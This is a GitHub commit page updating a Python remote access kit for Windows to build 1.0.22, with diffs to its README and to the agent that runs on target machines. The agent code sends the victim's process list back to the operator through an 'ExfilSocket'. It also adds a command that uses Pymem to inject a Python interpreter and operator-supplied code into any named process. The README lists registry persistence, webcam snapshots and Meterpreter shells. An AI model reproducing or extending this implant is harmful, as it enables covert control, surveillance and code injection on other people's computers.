Skip to content
This repository was archived by the owner on May 25, 2023. It is now read-only.

Commit d025404

Browse files
committed
Update 1.0.22
1 parent 1a6a10b commit d025404

39 files changed

+376
-290
lines changed

README.md

Lines changed: 11 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -24,10 +24,11 @@ If you're looking for an open-source project to abuse, Look elsewhere. The autho
2424
Created with Python 3.9.X
2525

2626
Client tested on:
27-
* Windows 10
27+
* Windows 10 x64
28+
* Windows 7 Ultimate SP1 x64
2829

2930
Server tested on:
30-
* Debian
31+
* Debian
3132

3233
# Features at release 1.0.0
3334
* Power Management (Shutdown/Reboot)
@@ -72,3 +73,11 @@ Server tested on:
7273
* Surveillance > Webcam > Snapshot
7374
* Various code optimizations
7475
* Fixed issue with agent disconnecting when server shuts down during initial handshake
76+
77+
# Update 1.0.22
78+
* Tested agent on Windows 7 Ultimate SP1. Working.
79+
* Re-coded task manager on client and server
80+
* Optimized context menu code. Menu now loads instantly
81+
* Tested powershell reg key peristence on Windows 7. Working.
82+
* Created python injector in Task Manager. Can inject python code into process's.
83+
* Added CMD, PS and Python Meterpreter shells to the python injector

agent/windows_10/agent.py

Lines changed: 24 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@
1010
# [A Remote Access Kit for Windows]
1111
# Author: SlizBinksman
1212
# Github: https://github.com/slizbinksman
13-
# Build: 1.0.21
13+
# Build: 1.0.22
1414
# -------------------------------------------------------------
1515

1616
import socket
@@ -22,10 +22,11 @@
2222
import threading
2323
import struct
2424
import cv2
25-
25+
import psutil
2626
from PIL import ImageGrab
2727
from time import sleep
2828
from cryptography.fernet import Fernet
29+
from pymem import Pymem
2930

3031
SEP = '<sep>' #Create static seperator string
3132
BUFFER = 4096 #Create static buffer int
@@ -57,12 +58,6 @@ def get_windows_version(self):
5758
version_output = version_output.replace('\n','') #Replace new line with empty string
5859
return version_output.strip('\r') #Strip carriage return and return the output
5960

60-
#Function will return the output of all running process's on the machine
61-
def get_running_process(self):
62-
command = subprocess.Popen(['powershell', 'get-process'],stdout=subprocess.PIPE,shell=True) #Run the command
63-
com_output = command.stdout.read().decode() #Capture, read and decode output
64-
return com_output #Return output
65-
6661
#Function will get computers local ip and return it as string
6762
def get_local_ip(self):
6863
local_ip = socket.gethostbyname(socket.gethostname()) #Resolve system name
@@ -116,8 +111,17 @@ def shutdown_computer(self):
116111

117112
#Function will send back a list of running process's to the server
118113
def extract_process_list(self):
119-
process_list = Utilitys().get_running_process() #Get process's
120-
ExfilSocket().exfil_socket_send(process_list) #Send to server
114+
process_string = '' # Define a local string to store information about the process's
115+
for process in psutil.process_iter(): # For each process found in the running process's
116+
process_name = process.name() # Get process name
117+
pid = process.pid # Get pid of process
118+
try:
119+
username = process.username() # Get username
120+
except psutil.AccessDenied:
121+
username = 'NT AUTHORITY\SYSTEM' # If we are running in userland, admin process's will raise an error on call to username. manually set uname.
122+
string = f'{process_name}{SEP}{str(pid)}{SEP}{username}{SEP}\n' #Create string
123+
process_string += string # Append string to local master string
124+
ExfilSocket().exfil_socket_send(process_string) #Send local master string to server
121125

122126
#Function will kill a task by the pid passed as parameter and send the output to the server
123127
def kill_task(self,pid):
@@ -162,6 +166,7 @@ def __init__(self):
162166
self.process_manager = 'proc_list'
163167
self.term_process = 'terminate'
164168
self.snapshot = 'snap_shot'
169+
self.inject_python = 'inject_pie'
165170

166171
#Function will connect to server to initiate handshake
167172
def connect_to_server(self):
@@ -259,6 +264,8 @@ def main(self):
259264
SystemManager().kill_task(server_command[1]) #kill the task by pid received from server
260265
if action_flag == self.snapshot: #if the action is to send a snapshot from the webcam
261266
StreamSocket().webcam_snapshot() #Send a webcam snapshot
267+
if action_flag == self.inject_python: #If the action is to inject some python code,
268+
CodeExecution().inject_and_exec(server_command[1],server_command[2]) #Inject python code
262269

263270
#Function will retrieve all data sent by server socket
264271
def recv_all_data(self):
@@ -379,4 +386,11 @@ def exec_(system_command): #Create local exec function
379386
pass
380387
MultiProcessor().start_child_thread_arg(exec_,system_command) #Start new thread for shell commands. Main thread will continue to communicate with server
381388

389+
#Function will inject a python interpreter into a process and then load
390+
#Python code to be executed by it.
391+
def inject_and_exec(self,process_name,python_code):
392+
process = Pymem(process_name) #Hooke the process
393+
process.inject_python_interpreter() #Inject the python dll
394+
process.inject_python_shellcode(python_code) #Inject the python code into the code
395+
382396
ClientSocket().connect_to_server()

core/Qt5/builder_guis/windows10/agent_builder_window.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@
1010
# [A Remote Access Kit for Windows]
1111
# Author: SlizBinksman
1212
# Github: https://github.com/slizbinksman
13-
# Build: 1.0.21
13+
# Build: 1.0.22
1414
# -------------------------------------------------------------
1515
from core.logging.logging import DNSconfigs,NetworkingConfigs
1616
from core.builder.windows10.agent_builder import Builder

core/Qt5/handling_guis/image_display_window.py

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@
1010
# [A Remote Access Kit for Windows]
1111
# Author: SlizBinksman
1212
# Github: https://github.com/slizbinksman
13-
# Build: 1.0.21
13+
# Build: 1.0.22
1414
# -------------------------------------------------------------
1515
import os
1616

@@ -32,10 +32,10 @@ def get_image_size(self):
3232

3333
#Function will save a file to the image_data directory with a random string for the name
3434
def save_raw_file(self):
35-
file_path = f'{ClientPath().image_data_dir}{Scrambler().scrambleVar(7)}.jpg'
36-
original_image_data = LoggingUtilitys().receive_file_bytes(DSFilePath().streaming_frame)
37-
LoggingUtilitys().write_bytes_to_file(file_path,original_image_data)
38-
Notifications().raise_notification(
35+
file_path = f'{ClientPath().image_data_dir}{Scrambler().scrambleVar(7)}.jpg' #Create local file path string with random string for file name
36+
original_image_data = LoggingUtilitys().receive_file_bytes(DSFilePath().streaming_frame) #Retrieve the bytes of the original image
37+
LoggingUtilitys().write_bytes_to_file(file_path,original_image_data) #Write those bytes to a new file and save it
38+
Notifications().raise_notification( #Notify the user with the name of the screenshot
3939
f'Saved file as {file_path}',
4040
'Success'
4141
)

0 commit comments

Comments
 (0)